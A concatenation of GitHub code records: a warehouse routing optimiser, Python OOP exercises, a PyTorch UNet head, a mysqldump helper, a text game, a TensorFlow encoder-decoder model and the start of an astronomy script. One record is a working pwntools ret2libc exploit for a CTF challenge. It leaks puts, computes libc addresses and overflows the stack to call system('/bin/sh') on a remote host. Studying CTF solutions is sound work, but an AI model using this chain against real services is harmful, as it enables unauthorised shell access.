Number of batches now is {len(self.batches)}\"\n )\n for batch in self.batches.values():\n if len(batch.route) == 0:\n self.greedy_cobot_tour(batch)\n # self.simulatedAnnealing(batch=batch)\n curr_sol = copy.deepcopy(self.batches)\n item_id_pod_id_dict_copy = copy.deepcopy(self.item_id_pod_id_dict)\n # self.tests()\n else:\n self.batches = copy.deepcopy(curr_sol)\n self.item_id_pod_id_dict = copy.deepcopy(item_id_pod_id_dict_copy)\n return bool(improvement * change), destroy_batch\n\n def repair(self):\n improvement = True\n while (\n not all(\n [batch.weight <= self.batch_weight for batch in self.batches.values()]\n )\n and improvement\n ):\n improvement = False\n curr_sol = copy.deepcopy(self.batches)\n item_id_pod_id_dict_copy = copy.deepcopy(self.item_id_pod_id_dict)\n inf_batch = next(\n batch for batch in self.batches.values() if batch.weight > self.batch_weight\n )\n for other_batch in [\n batch\n for batch in copy.deepcopy(self.batches).values()\n if batch.ID != inf_batch.ID\n ]:\n self.batches.pop(inf_batch.ID)\n slack = np.abs(inf_batch.weight - other_batch.weight)\n self.batches.pop(other_batch.ID)\n orders_of_batches = dict(\n **copy.deepcopy(inf_batch.orders),\n **copy.deepcopy(other_batch.orders),\n )\n batch1_orders, batch2_orders = self.kk(\n [i for i in orders_of_batches.values()]\n )\n batch1_orders = [\n i for i in orders_of_batches.values() if i.ID in batch1_orders\n ]\n batch2_orders = [\n i for i in orders_of_batches.values() if i.ID in batch2_orders\n ]\n b1_id = str(self.get_new_batch_id())\n b1 = BatchNew(b1_id, inf_batch.pack_station)\n [b1.add_order(order) for order in batch1_orders]\n self.batches.update({b1.ID: b1})\n b2_id = str(self.get_new_batch_id())\n b2 = BatchNew(b2_id, other_batch.pack_station)\n [b2.add_order(order) for order in batch2_orders]\n self.batches.update({b2.ID: b2})\n if all(\n [\n batch.weight <= self.batch_weight\n for batch in self.batches.values()\n ]\n ):\n return True\n elif np.abs(b1.weight - b2.weight) < slack:\n improvement = self.repair()\n return improvement\n else:\n self.batches = copy.deepcopy(curr_sol)\n self.item_id_pod_id_dict = copy.deepcopy(item_id_pod_id_dict_copy)\n return improvement\n\n def reduced_vns(self, max_iters, t_max, k_max):\n \"\"\"\n :param max_iters: maximum number of iterations\n :param t_max: maximum cpu time\n :param k_max: maximum number of different neighborhoods / shake operations to be performed\n \"\"\"\n iters = 0\n starttime = time.time()\n t = time.time() - starttime\n time_till_best = None\n curr_fit = self.get_fitness_of_solution()\n best_fit = curr_fit\n curr_sol = copy.deepcopy(self.batches)\n best_sol = copy.deepcopy(curr_sol)\n item_id_pod_id_dict_copy = copy.deepcopy(self.item_id_pod_id_dict)\n T = curr_fit * 0.05\n while iters < max_iters and t < t_max:\n print(\"Start iteration {} of VNS\".format(str(iters)))\n k = 1\n while k < k_max:\n self.shake(k)\n improvement = True\n while improvement:\n fit_before_ls = self.get_fitness_of_solution()\n self.reduce_number_of_batches(max_tries=3)\n self.randomized_local_search(max_iters=20, k=k)\n neighbor_fit = self.get_fitness_of_solution()\n print(\"curr fit: {}; cand fit {}\".format(curr_fit, neighbor_fit))\n if neighbor_fit < fit_before_ls:\n improvement = True\n else:\n improvement = False\n if (\n neighbor_fit < curr_fit\n ):\n self.tests()\n\n curr_fit = neighbor_fit # accept new solution\n\n curr_sol = copy.deepcopy(self.batches)\n item_id_pod_id_dict_copy = copy.deepcopy(\n self.item_id_pod_id_dict\n )\n k = 1\n if curr_fit < best_fit:\n 
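# new incumbent: remember when it was found and re-anchor the\n                            # acceptance temperature to the new best fitness\n                            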
time_till_best = time.time() - starttime\n best_sol = copy.deepcopy(self.batches)\n best_fit = self.get_fitness_of_solution()\n T = best_fit * 0.0001\n elif self.acceptWithProbability(neighbor_fit, best_fit, T):\n curr_fit = neighbor_fit # accept new solution\n\n curr_sol = copy.deepcopy(self.batches)\n item_id_pod_id_dict_copy = copy.deepcopy(\n self.item_id_pod_id_dict\n )\n k += 1\n else:\n self.batches = copy.deepcopy(\n curr_sol\n ) # don´t accept new solution and stick with the current one\n self.item_id_pod_id_dict = copy.deepcopy(\n item_id_pod_id_dict_copy\n )\n improvement = False\n k += 1\n iters += 1\n t = time.time() - starttime\n\n self.batches = best_sol\n print(\"best fitness: \", best_fit)\n print(f\"took {time_till_best} seconds\")\n\n\nif __name__ == \"__main__\":\n SKUS = [\"24\", \"360\"] # options: 24 and 360\n SUBSCRIPTS = [\"\", \"_a\", \"_b\"] # , \"_a\", \"_b\"\n NUM_ORDERSS = [20] # [10,\n MEANS = [\"1x6\", \"5\"] # \"1x6\",, \"5\"\n instance_sols = {}\n model_sols = {}\n NUM_DEPOTS = 2\n for SKU in SKUS:\n for SUBSCRIPT in SUBSCRIPTS:\n for NUM_ORDERS in NUM_ORDERSS:\n for MEAN in MEANS:\n # CAUTION: SCRIPT WONT RUN IF ALL SOLUTIONS ARE WRITTEN AND THIS IS NOT PUT IN COMMENTS\n # if os.path.isfile('solutions/final/orders_{}_mean_5_sku_{}{}_{}.xml'.format(str(NUM_ORDERS), SKU, SUBSCRIPT, \"mixed\")):\n # continue # skip iteration if the instance has been solved already\n # try:\n layoutFile = r\"data/layout/1-1-1-2-1.xlayo\"\n\n podInfoFile = \"data/sku{}/pods_infos.txt\".format(SKU)\n instances = {}\n instances[24, 2] = r\"data/sku{}/layout_sku_{}_{}.xml\".format(\n SKU, SKU, NUM_DEPOTS\n )\n\n storagePolicies = {}\n storagePolicies[\"dedicated\"] = \"data/sku{}/pods_items_dedicated_1.txt\".format(SKU)\n # storagePolicies['mixed'] = 'data/sku{}/pods_items_mixed_shevels_1-5.txt'.format(SKU)\n # storagePolicies['mixed'] = 'data/sku{}/pods_items_mixed_shevels_1-10.txt'.format(SKU)\n\n orders = {}\n orders[\n \"{}_5\".format(str(NUM_ORDERS))\n ] = r\"data/sku{}/orders_{}_mean_{}_sku_{}{}.xml\".format(\n SKU, str(NUM_ORDERS), MEAN, SKU, SUBSCRIPT\n )\n input_files = [storagePolicies, instances, orders, layoutFile, podInfoFile]\n\n sols_and_runtimes = {}\n runtimes = [120]\n for runtime in runtimes:\n np.random.seed(1999851)\n if runtime == 0:\n ils = GreedyMixedShelves(input_files)\n ils.apply_greedy_heuristic()\n else:\n ils = VariableNeighborhoodSearch(input_files)\n STORAGE_STRATEGY = (\n \"dedicated\" if ils.is_storage_dedicated else \"mixed\"\n )\n print(\n \"Now optimizing: SKU={}; Order={}; Subscript={}; Mean={}; Storage={}\".format(\n SKU, NUM_ORDERS, SUBSCRIPT, MEAN, STORAGE_STRATEGY\n )\n )\n ils.reduced_vns(max_iters=100, t_max=runtime, k_max=4)\n # ils.perform_ils(num_iters=1500, t_max=runtime)\n # vns = VariableNeighborhoodSearch()\n # vns.reduced_vns(1500, runtime, 2)\n STORAGE_STRATEGY = (\n \"dedicated\" if ils.is_storage_dedicated else \"mixed\"\n )\n ils.write_solution_to_xml(\n \"solutions/orders_{}_mean_{}_sku_{}{}_{}.xml\".format(\n str(NUM_ORDERS), MEAN, SKU, SUBSCRIPT, STORAGE_STRATEGY\n )\n )\n # sols_and_runtimes[runtime] = (vns.get_fitness_of_solution(), {batch.ID: batch.route for\n # batch in vns.batches.values()})\n print(sols_and_runtimes)\n instance_sols[(SKU, SUBSCRIPT, NUM_ORDERS)] = sols_and_runtimes\n model_sols[\n (SKU, SUBSCRIPT, NUM_ORDERS, \"ILS\")\n ] = ils.get_fitness_of_solution()\n # model_sols[(SKU, SUBSCRIPT, NUM_ORDERS, \"VNS\")] = vns.get_fitness_of_solution()\n # except Exception as e:\n # print(e)\n # continue\n\n # 
with open('../analyse_solution/solutions/mixed360_random_ls_not_random_twoopt.pickle', 'wb') as handle:\n    #     pickle.dump(instance_sols, handle, protocol=pickle.HIGHEST_PROTOCOL)\n    with open(\n        \"../analyse_solution/solutions/mixed_fitness_ils_vns.pickle\", \"wb\"\n    ) as handle:\n        pickle.dump(model_sols, handle, protocol=pickle.HIGHEST_PROTOCOL)\n","repo_name":"LTluttmann/cobot_shortest_path","sub_path":"instance_demo/agv_routing_mixed.py","file_name":"agv_routing_mixed.py","file_ext":"py","file_size_in_byte":72481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"4478319291","text":"#!/usr/bin/python3\n\n\"\"\"Defining a function that checks whether\n an object belongs to a class or is inherited from it\n\"\"\"\n\n\ndef is_kind_of_class(obj, a_class):\n    \"\"\"\n    Checks if an object is an instance of a class, or an instance\\\n    of a class that inherited from it\n\n    Args:\n        obj (object): The object to be tested for membership to a class\n        a_class (class): The class\n\n    Return: True or False\n\n    Raises:\n        TypeError\n    \"\"\"\n    if not isinstance(a_class, type):\n        raise TypeError(\"a_class type must be type\")\n    if isinstance(obj, a_class) or issubclass(type(obj), a_class):\n        return True\n    return False\n","repo_name":"Muna-Redi/alx-higher_level_programming","sub_path":"0x0A-python-inheritance/3-is_kind_of_class.py","file_name":"3-is_kind_of_class.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"25103377811","text":"#------------- constructor -----------\r\n\r\nclass Emp:\r\n    no_of_leave = 5\r\n\r\n    #self:- self is the instance on which the function is being called\r\n    def info_printer(self):\r\n        return f\"Employee name is {self.name} and salary is {self.sal} and roll is {self.roll}\"\r\n    #here self means the object, e.g. if we call info_printer on deepak then\r\n    #self.name and self.sal become deepak.name and deepak.sal, i.e. self stands for deepak\r\n\r\n    #----------- __init__ -----------\r\n    #it is used to make an instance so we do not have to write the assignments again and again below\r\n    def __init__(self , aname , asal , aroll ):\r\n        self.name = aname \r\n        self.sal = asal\r\n        self.roll = aroll\r\n\r\n#__init__ method for making an instance from the class\r\nkunal = Emp(\"kunal\" , 900 , \"programmer\")\r\n\r\nprint(kunal.info_printer())\r\n\r\n\r\n#old method\r\n'''#-------------- object ----------------\r\nankit = Emp() \r\ndeepak = Emp()\r\n\r\n#--------------- instance variables -------------- \r\nankit.name = \"ankit\"\r\nankit.sal = 500\r\nankit.roll = \"HR\"\r\n\r\ndeepak.name = \"ankit\"\r\ndeepak.sal = 600\r\ndeepak.roll = \"employee\"'''\r\n\r\n\r\n#in deepak.info_printer(), deepak is passed to info_printer as the self argument\r\n\r\n#making an object, i.e. creating an instance of Emp\r\n","repo_name":"ankit-programming/python_prac","sub_path":"python programming/cui/oops/oops4 (self & __init__() constructor).py","file_name":"oops4 (self & __init__() constructor).py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"17163412320","text":"from pwn import *\r\nfrom LibcSearcher import *\r\nimport sys\r\nremote_addr = ["43.143.7.97",28919]\r\nlibc=ELF('./libc.so.6')\r\nif len(sys.argv) == 1:\r\n    context.log_level=\"debug\" \r\n    #p = process([\"qemu-aarch64\", \"-L\", \"/usr/aarch64-linux-gnu/\", \"-g\",\"1234\",\"./stack\"]) \r\n    #p = process([\"qemu-aarch64\", \"-L\", \".\", \"./stack\"]) 
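\r\n    # no extra argv: start the challenge binary locally with debug logging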
\r\n p = process(\"./ezrop64\")\r\n context(arch='amd64', os='linux')\r\nif len(sys.argv) == 2 :\r\n if 'r' in sys.argv[1]:\r\n p = remote(remote_addr[0],remote_addr[1])\r\n if 'n' not in sys.argv[1]:\r\n context.log_level=\"debug\" \r\n #context(arch = 'amd64', os = 'linux')\r\nr = lambda : p.recv()\r\nrl = lambda : p.recvline()\r\nrc = lambda x: p.recv(x)\r\nru = lambda x: p.recvuntil(x)\r\nrud = lambda x: p.recvuntil(x, drop=True)\r\ns = lambda x: p.send(x)\r\nsl = lambda x: p.sendline(x)\r\nsa = lambda x, y: p.sendafter(x, y)\r\nsla = lambda x, y: p.sendlineafter(x, y)\r\nshell = lambda : p.interactive()\r\npr = lambda name,x : log.info(name+':'+hex(x))\r\n\r\n#gdb.attach(p)\r\npop_rdi = 0x4012a3\r\nret = 0x40101a\r\nru(b'rop.\\n')\r\nputs_addr = int(p.recvline()[-15:-1],16)\r\npr('puts_addr',puts_addr)\r\n\r\nlibc_base = puts_addr - libc.symbols['puts']\r\nsystem_addr = libc_base + libc.symbols['system']\r\nbinsh_addr = libc_base + next(libc.search(b'/bin/sh'))\r\npr('libc_base',libc_base)\r\n\r\npayload = b'a' * (0x100 + 8) + p64(ret) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)\r\nsl(payload)\r\n\r\nshell()\r\n","repo_name":"BattiestStone4/pwn-problems","sub_path":"HNCTF2022_ezr0p64/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"36843896166","text":"import torch\nimport torch.nn as nn\nclass Unet_Head(nn.Module):\n def __init__(self, num_keypoint=16, mode='train'):\n super(Unet_Head, self).__init__()\n\n self.mode = mode\n\n self.init_weight()\n\n self.header_heatmaps = nn.Sequential(*[\n nn.Conv2d(16, num_keypoint, 1, 1, 0, bias=True),\n nn.Sigmoid()\n ])\n\n def init_weight(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n # m.weight.data.normal_(0, 0.01)\n torch.nn.init.kaiming_normal_(m.weight.data, nonlinearity='relu')\n # torch.nn.init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n def forward(self, x):\n\n res = []\n h1 = self.header_heatmaps(x)\n res = h1\n return res\n","repo_name":"hanpier/keypoint","sub_path":"lib/models/head/Unet_head.py","file_name":"Unet_head.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6973998980","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nimport re\n\nimport pymysql\nimport six\n\n\ndef get_mysqldump_args_and_env_from_url(url):\n \"\"\"\n Constructs list of command line arguments and dictionary of environment\n variables that can be given to `mysqldump` executable to obtain database\n dump of the database described in given URL.\n\n :param url: Parsed database URL.\n :type url: urllib.urlparse.ParseResult\n\n :return: List of command line arguments as well as dictionary of\n environment variables that can be used to launch the MySQL dump\n process to obtain dump of the database.\n :rtype: tuple[list[str],dict[str,str]]\n \"\"\"\n args = [\n # Without this, `INSERT INTO` statements will exclude column names from\n # the output, which are required for sanitation.\n \"--complete-insert\",\n\n # This enables use for \"exteded inserts\" where multiple rows of a table\n # are included in a single `INSERT INTO` statement (contents of the\n # entire table even, if it's within limits). 
We use it to increase the\n        # performance of the sanitation and to decrease the dump size.\n        \"--extended-insert\",\n\n        # This makes `mysqldump` attempt to limit the size of a single line to\n        # roughly 10 kilobytes (the value is in bytes). We use it to reduce\n        # memory consumption.\n        \"--net_buffer_length=10240\",\n\n        # Hostname of the database to connect to; it should always be present\n        # in the parsed database URL.\n        \"-h\",\n        url.hostname,\n    ]\n    env = {}\n\n    if url.port is not None:\n        args.extend((\"-P\", six.text_type(url.port)))\n\n    if url.username:\n        args.extend((\"-u\", url.username))\n\n    if url.password:\n        env[\"MYSQL_PWD\"] = url.password\n\n    if len(url.path) < 2 or not url.path.startswith(\"/\"):\n        raise ValueError(\"Name of the database is missing from the URL\")\n\n    args.append(url.path[1:])\n\n    return args, env\n\n\nMYSQL_NULL_PATTERN = re.compile(r\"^NULL$\", re.IGNORECASE)\nMYSQL_BOOLEAN_PATTERN = re.compile(r\"^(TRUE|FALSE)$\", re.IGNORECASE)\nMYSQL_FLOAT_PATTERN = re.compile(r\"^[+-]?\\d*\\.\\d+([eE][+-]?\\d+)?$\")\nMYSQL_INT_PATTERN = re.compile(r\"^\\d+$\")\nMYSQL_STRING_PATTERN = re.compile(r\"'(?:[^']|''|\\\\')*(?
')\n print('To succeed, you will need to gain experience and money, ')\n print('which can be used to level up your character and purchase helpful items.')\n print('')\n print('To navigate through the game, you will be presented with a main menu ')\n print('where you can choose from six different operations: ')\n print('\"Go to the battle field\" \"Recover your HP or energy\" \"Go to the shop\" \"Show my backpack\" \"Show my status\" and \"Exit the game\" ')\n print('Use the arrow keys or type the corresponding number to select your desired option.')\n print('')\n print('During battles, you will need to select your actions carefully to defeat your opponents ')\n print('while preserving your own health and energy levels. ')\n print('You can choose to attack, recover, or run away. ')\n print('Use your strategic thinking to win the battle and move on to the next stage.')\n print('')\n print('Do not forget to use the \"recover\" operation to replenish your health and energy levels when necessary, ')\n print('and the \"shop\" operation to purchase helpful items such as weapons, shields, and potions. ')\n print('Keep track of your items using the \"bag\" operation and monitor your progress using the \"status\" operation.')\n print('')\n print('Good luck on your adventure!')\n print('----------------------------')\n\n def attack(self, monster):\n \"\"\"\n This function allows a round of attacking each other\n\n Args:\n monster (Monster): The monster in the attack.\n\n Returns:\n none.\n \"\"\"\n # The adventurer makes the attack first\n self._adventurer.attack(monster)\n # If the monster and adventurer are both alive, the monster attacks back\n if monster.getHp() > 0 and self._adventurer.getStatus():\n print(\"Watch out! The enemy is trying to attack you! \")\n print(\"\")\n self._adventurer.attacked(monster)\n\n def battle(self, gameStage):\n \"\"\"\n This function allows the battle in a specific game field.\n\n Args:\n gameStage (str): The name of the battle-field/stage.\n\n Returns:\n none.\n \"\"\"\n\n print(\"Hello adventurer, here is the enemy you are going to challenge: \")\n print(\"----------------------------------------------------------------\")\n self.refreshEnemy()\n m = next(filter(lambda i: str(i.getLevel()) == gameStage, self._enemyList), Monster(\"1\", 1, 1, 1, 1))\n\n statusA = self._adventurer.getStatus()\n statusM = m.getStatus()\n\n # Display the monster information\n m.display()\n print(\"----------------------------------------------------------------\")\n # The battle continues if nobody dies\n while statusA and statusM:\n print(\"Which action would you like to take: 1. Attack; 2. Recover; 3. 
Escape.\")\n # print(\"Please enter your option: \")\n invalidInput = False\n while not invalidInput:\n choice = input(\"Please enter your option: \")\n print(\"\")\n try:\n choice = int(choice)\n if choice in range(1, 4):\n invalidInput = True\n if choice == 1:\n self._adventurer.back()\n self.attack(m)\n # Update the status\n statusA = self._adventurer.getStatus()\n statusM = m.getStatus()\n if choice == 2:\n self._adventurer.usePotion()\n if choice == 3:\n self._adventurer.escape()\n return\n except ValueError:\n print(\"Invalid input, please try again.\")\n # If the adventurer is alive and the monster is dead\n if statusA and not statusM:\n print(\"You won the battle!\")\n # If it's not the final stage,\n # update the obtained experience, money, item from the triumph,\n # and unlock the next field/stage\n if gameStage != '3':\n xp = m.getXP()\n g = m.getGold()\n self._adventurer.updateExperience(xp)\n self._adventurer.updateMoney(g)\n if type(m) == MediumMonster:\n item = m.getEquipment()\n print(\"You won \", item.getName())\n self._adventurer.addItem(item)\n newGameStage = {\n 1.1: 1.2,\n 1.2: 2.1,\n 2.1: 2.2,\n 2.2: 3\n }.get(float(gameStage))\n if newGameStage is not None:\n self._adventurer.addUnlocked(str(newGameStage))\n else:\n self._adventurer.addUnlocked(\"4\") # 4 indicates victory in the whole game\n # Finds the corresponding next stage based on the current game stage gameStage\n # adds it to the player object's list of unlocked stages.\n # If no value for the next stage is found, assume the game is complete and\n # add the string representing the victory status to the list of unlocked stages\n\n\n def generatePlayer(self):\n \"\"\"\n This function generate the adventurer, allow user to put the name.\n\n Args:\n none.\n\n Returns:\n none.\n \"\"\"\n adventurerName = input(\"Please enter your name:\")\n # print('----------------------------')\n self._adventurer = Adventurer(adventurerName)\n\n def generateEnemiesItems(self):\n \"\"\"\n This function generates enemies and items.\n\n Args:\n none.\n\n Returns:\n none.\n \"\"\"\n hpPotion1 = HPpotion(name='HP Potion(small)', weight=10, price=100, hpRegeneration=100) # name, weight, price\n hpPotion2 = HPpotion('HP Potion(large)', 15, 200, 300)\n energyPotion1 = EnergyPotion('Energy Potion(small)', 10, 100, 100)\n energyPotion2 = EnergyPotion('Energy Potion(large)', 15, 200, 300)\n\n fist = Weapon('Your fist', 0, 0, 20, 10) # name, weight, price, attack_power, energyConsumption\n # The initial item in the backpack is fist\n self._adventurer._backpack.append(fist)\n\n weapon1 = Weapon('Dagger', 16, 10, 80, 15)\n weapon2 = Weapon('Sword', 20, 100, 50, 10)\n shield1 = Shield('Wooden Shield', 10, 100, 5) # name, weight, price, defencePower\n shield2 = Shield('Ironclad Defender', 20, 200, 10)\n\n self._enemyList.append(SmallMonster('Goblin', 50, 100, 10, 1.1, 100)) # name, hp, xp, attack_power, level, gold\n self._enemyList.append(SmallMonster('Skeleton', 70, 200, 20, 1.2, 200))\n self._enemyList.append(MediumMonster('Giant spider', 150, 400, 30, 2.1, 500,\n weapon1)) # name, hp, xp, attack_power, level, gold, equipment: Item\n self._enemyList.append(MediumMonster('Werewolf', 250, 200, 40, 2.2, 600, shield1))\n self._enemyList.append(Monster('Vampire', 300, 200, 50, 3))\n\n itemList = [hpPotion1, hpPotion2, energyPotion1, energyPotion2, weapon2, shield2]\n for i in itemList:\n self._shop.addItem(i)\n\n def refreshEnemy(self):\n \"\"\"\n This function refreshes the enemyList, it is called every time after the battle.\n\n Args:\n 
none.\n\n Returns:\n none.\n \"\"\"\n self._enemyList = []\n weapon1 = Weapon('Dagger', 20, 10, 80, 15)\n shield1 = Shield('Wooden Shield', 10, 100, 5)\n self._enemyList.append(SmallMonster('Goblin', 50, 100, 10, 1.1, 100)) # name, hp, xp, attack_power, level, gold\n self._enemyList.append(SmallMonster('Skeleton', 70, 200, 20, 1.2, 200))\n self._enemyList.append(MediumMonster('Giant spider', 150, 400, 30, 2.1, 500,\n weapon1)) # name, hp, xp, attack_power, level, gold, equipment: Item\n self._enemyList.append(MediumMonster('Werewolf', 250, 200, 40, 2.2, 600, shield1))\n self._enemyList.append(Monster('Vampire', 300, 200, 50, 3))\n\n\n def initialize(self):\n \"\"\"\n This function initializes the game, generating adventurer, monsters, shop, and items.\n\n Args:\n none.\n\n Returns:\n none.\n \"\"\"\n self.printIntro()\n self.generatePlayer()\n self.generateEnemiesItems()\n\n\n def checkWinLose(self):\n \"\"\"\n This function checks the current status of the game.\n\n Args:\n none.\n\n Returns:\n int: represent different status of the game.\n \"\"\"\n # There are 5 fields in the game in total,\n # if the length pf unlocked list exceeds 5, that's a sign of victory\n if len(self._adventurer.getUnlocked()) == 6:\n return 1 # unlock all the list, win\n elif self._quit == True:\n return 2 # quit, lose\n elif self._adventurer.getStatus() == False:\n return 3 # adventurer die, lose\n else:\n return 4\n\n def showOperation(self):\n \"\"\"\n This function shows the operations the adventurer can make in the main menu.\n\n Args:\n none.\n\n Returns:\n none.\n \"\"\"\n print('----------------MENU----------------')\n print(\"1. Go to the battle field.\")\n print(\"2. Recover your HP or energy.\")\n print(\"3. Go to the shop.\")\n print(\"4. Show my backpack.\")\n print(\"5. Show my status.\")\n print(\"6. Exit the game.\")\n\n def exit(self):\n \"\"\"\n This function allows the adventurer to quit the game.\n\n Args:\n none.\n\n Returns:\n none.\n \"\"\"\n self._quit = True\n\n def shop(self):\n \"\"\"\n This function makes the adventurer enter the shop,\n sell or buy items in the shop.\n\n Args:\n none.\n\n Returns:\n Function: getMain() or shop().\n \"\"\"\n print(\"-------------------------------------------------------------------------\")\n print(\"Hello adventurer! Welcome to the Wonder Shop, do you want to sell or buy?\")\n print(\"1. I want to sell something.\")\n print(\"2. I want to buy something.\")\n print(\"3. Exit.\")\n chosen = input(\"Please enter your option:\")\n if chosen == str(1):\n self._adventurer.sellItem()\n elif chosen == str(2):\n self._shop.display()\n choice = input(\"Please enter the index of item you want, if you want to exit, enter others:\")\n try:\n choice = int(choice)\n if choice in range(0, self._shop.getLen()):\n self._adventurer.buy(self._shop.getItem(choice))\n else:\n return self.getMain()\n except ValueError:\n return self.getMain()\n elif chosen == str(3):\n return self.getMain()\n else:\n print(\"Invalid input, please try again.\")\n return self.shop()\n\n\n def getMain(self):\n \"\"\"\n This function leads to the main menu.\n\n Args:\n none.\n\n Returns:\n none.\n \"\"\"\n print(\"Welcome to the main menu! 
Here you can choose one of the options below:\")\n self.showOperation()\n print(\"--------------------------------------\")\n operation = input(\"Which option would you like to choose:\")\n print(\"\")\n if len(self._adventurer.getUnlocked()) == 6:\n return\n elif operation == str(1):\n print(\"Battle fields you have unlocked:\")\n print(self._adventurer.getUnlocked())\n print(\"\")\n invalidInput = True\n while invalidInput:\n stageSelected = input(\"Please enter the level you want to challenge:\")\n print(\"\")\n if stageSelected in self._adventurer.getUnlocked():\n invalidInput = False\n self.battle(str(stageSelected))\n if self._adventurer.getStatus():\n return\n\n elif operation == str(2):\n self._adventurer.usePotion()\n return\n elif operation == str(3):\n self.shop()\n return\n elif operation == str(4):\n self._adventurer.displayBackpack()\n return\n elif operation == str(5):\n self._adventurer.display()\n return\n elif operation == str(6):\n self.exit()\n else:\n print('Invalid input, please try again.')\n\n","repo_name":"Siyan-Luo/Advanced-Programming-Concept","sub_path":"Project/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":14522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36519347670","text":"# -*- coding: utf-8 -*-\n\nimport tensorflow as tf\nfrom tensorflow.python.layers.core import Dense\nfrom tensorflow.contrib import rnn\n\n# Write your code here\nclass Model(object):\n def __init__(self, max_len=40, emb_dim=128, hidden_dim=256, vocab_size=10000, use_clip=True, learning_rate=0.01, end_token=0):\n self.initializer = tf.random_uniform_initializer(-0.1, 0.1)\n self.max_len = max_len\n self.emb_dim = emb_dim\n self.hidden_dim = hidden_dim\n\n self.vocab_size = vocab_size\n self.use_clip = use_clip\n self.learning_rate = learning_rate\n self.end_token = end_token\n\n # Placeholder\n self.x = tf.placeholder(dtype=tf.int32, shape=(None, max_len))\n self.x_len = tf.placeholder(dtype=tf.int32, shape=(None, ))\n self.x_len = self.x_len - 1\n self.batch_max_len = tf.reduce_max(self.x_len)\n\n # sequence mask for different size\n self.batch_size = tf.shape(self.x)[0]\n self.encoder_input = self.x[:,:]\n self.decoder_output = self.x[:,:]\n self.x_mask = tf.sequence_mask(lengths=self.x_len, maxlen=self.batch_max_len, dtype=tf.float32)\n\n # Embedding\n self.emb_W = self.get_var(name='emb_W', shape=[self.vocab_size, self.emb_dim])\n self.input_emb = tf.nn.embedding_lookup(self.emb_W, self.encoder_input)\n self.output_emb = tf.nn.embedding_lookup(self.emb_W, self.decoder_output)\n\n self.build_model()\n self.build_loss()\n self.build_opt()\n\n def build_model(self):\n # Encoder cell\n encoder_cell = tf.nn.rnn_cell.BasicLSTMCell(self.hidden_dim)\n\n # Dynamic encoding\n enc_output, self.enc_states = tf.nn.dynamic_rnn(cell=encoder_cell, inputs=self.input_emb,\n sequence_length=self.x_len, dtype=tf.float32)\n\n # Output layer\n self.out_layer = Dense(self.vocab_size, dtype=tf.float32, name='out_layer')\n\n # Decoder cell\n decoder_cell = tf.nn.rnn_cell.BasicLSTMCell(self.hidden_dim)\n\n helper = tf.contrib.seq2seq.TrainingHelper(self.output_emb, self.x_len, time_major=False)\n decoder = tf.contrib.seq2seq.BasicDecoder(decoder_cell, helper, self.enc_states, output_layer=self.out_layer)\n outputs, states, length = tf.contrib.seq2seq.dynamic_decode(decoder=decoder, maximum_iterations=self.max_len)\n self.logits = outputs.rnn_output\n self.output = tf.argmax(self.logits, 2)\n\n def build_loss(self):\n 
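# cross entropy is averaged over real tokens only: x_mask zeroes out the\n        # padded timesteps (the small epsilon guards against an empty mask)\n        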
target_labels = self.decoder_output[:, :self.batch_max_len]\n        self.cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(\n            labels=target_labels, logits=self.logits)\n        self.loss = tf.reduce_sum(self.cross_entropy * self.x_mask) / (tf.reduce_sum(self.x_mask) + 1e-10)\n\n    def build_opt(self):\n        # define optimizer\n        optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate)\n        grad, var = zip(*optimizer.compute_gradients(self.loss))\n\n        # gradient clipping\n        def clipped_grad(grad):\n            return [None if g is None else tf.clip_by_norm(g, 2.5) for g in grad]\n\n        if self.use_clip:\n            grad = clipped_grad(grad)\n\n        self.update = optimizer.apply_gradients(zip(grad, var))\n\n    def leaky_relu(self, x):\n        return tf.maximum((x), 0.1*(x))\n\n    def get_var(self, name='', shape=None, dtype=tf.float32):\n        return tf.get_variable(name, shape, dtype=dtype, initializer=self.initializer)\n\n\n    def save(self, sess, global_step=None):\n        var_list = [var for var in tf.all_variables()]\n        saver = tf.train.Saver(var_list)\n        save_path = saver.save(sess, save_path=\"models/encdec\", global_step=global_step)\n        print(' * model saved at \\'{}\\''.format(save_path))\n\n    # Load whole weights\n    def restore(self, sess):\n        print(' - Restoring variables...')\n        var_list = [var for var in tf.all_variables()]\n        saver = tf.train.Saver(var_list)\n        saver.restore(sess, \"models/encdec\")\n        print(' * model restored ')","repo_name":"leekeon/AI","sub_path":"2. SKKU/4.NLP_Deep_Learning/day2/2-3. RNN Encoder Decoder/encoder_decoder_model.py","file_name":"encoder_decoder_model.py","file_ext":"py","file_size_in_byte":4062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"21004140608","text":"\"\"\"\nScript to work out the statistical significance of the inner region. 
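Candidates are counted inside and outside a chosen comoving radius of the\nquasar; the Poisson tail probability of the inner count is then converted\ninto an equivalent Gaussian sigma.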
